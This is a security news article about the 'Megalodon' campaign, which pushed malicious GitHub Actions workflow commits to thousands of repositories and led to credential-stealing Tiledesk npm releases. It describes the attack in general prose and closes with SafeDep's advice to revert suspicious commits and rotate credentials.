Massive GitHub Repository Breach Exposes 5,561 Accounts to Malware Risk

Post Views: 5

Security Firm Discovers Massive Automated Attack on GitHub Repositories

In a significant breach, cybersecurity firm SafeDep recently identified a massive automated attack on GitHub, impacting 5,561 repositories. Dubbed “Megalodon,” the campaign targeted the software platform within a six-hour window on May 18, 2026, pushing a total of 5,718 fake code updates.

The Attackers’ Strategy

The attackers utilized fake GitHub accounts with randomly generated eight-character names to conceal their identities.
They further obfuscated their tracks by modifying system settings to resemble legitimate automated services, employing sender identities such as build-bot, auto-ci, ci-bot, and pipeline-bot.

Concurrent Hacking Attempt by TeamPCP

The incident occurred concurrently with another hacking attempt by TeamPCP, which compromised a GitHub employee’s device and breached 3,800 repositories through a malicious Visual Studio Code (VS Code) extension.

According to SafeDep’s analysis, the attackers employed two primary automated code techniques:

SysDiag involves adding a new file named “.github/workflows/ci.yml” that triggers a data-stealing script whenever a developer updates their project.
Optimize-Build is more stealthy, replacing existing system files and utilizing a command called “workflow_dispatch” to maintain the malicious code dormant.

Tiledesk Affected

Tiledesk, a prominent live chat and chatbot service, fell prey to this attack, with hackers compromising nine of its code areas on GitHub.

The main developer failed to recognize the poisoned files, inadvertently publishing seven infected versions of their product, including @tiledesk/tiledesk-server (versions 2.18.6 through 2.18.12), to the public npm package registry between May 19 and 21, 2026.

Upon execution, the hidden script opens a terminal window and runs a decoded 111-line background program, copying internal files and data, which are then transmitted to a hacker-controlled Command and Control (C2) server located at 216.126.225.129:8443.

The malware compromises credentials from notable cloud systems such as Amazon Web Services, Google Cloud, and Microsoft Azure, searching for system logs, digital history, and code files to identify 30 types of private passwords, database links, and secret digital keys.

SafeDep’s Warning

SafeDep warns that the most concerning consequence is that hackers can obtain special verification tokens to impersonate the GitHub Actions workflow, deceiving linked cloud environments into believing they are legitimate users.

As a result, SafeDep advises developers who encountered unusual code updates from emails like build-[protected] or [protected] on May 18 to undo the changes and promptly update their cloud passwords.

Recommendations

Developers should monitor repository activity and swiftly address any suspicious code updates to prevent similar incidents in the future.
They should also ensure that their cloud accounts have up-to-date security measures in place.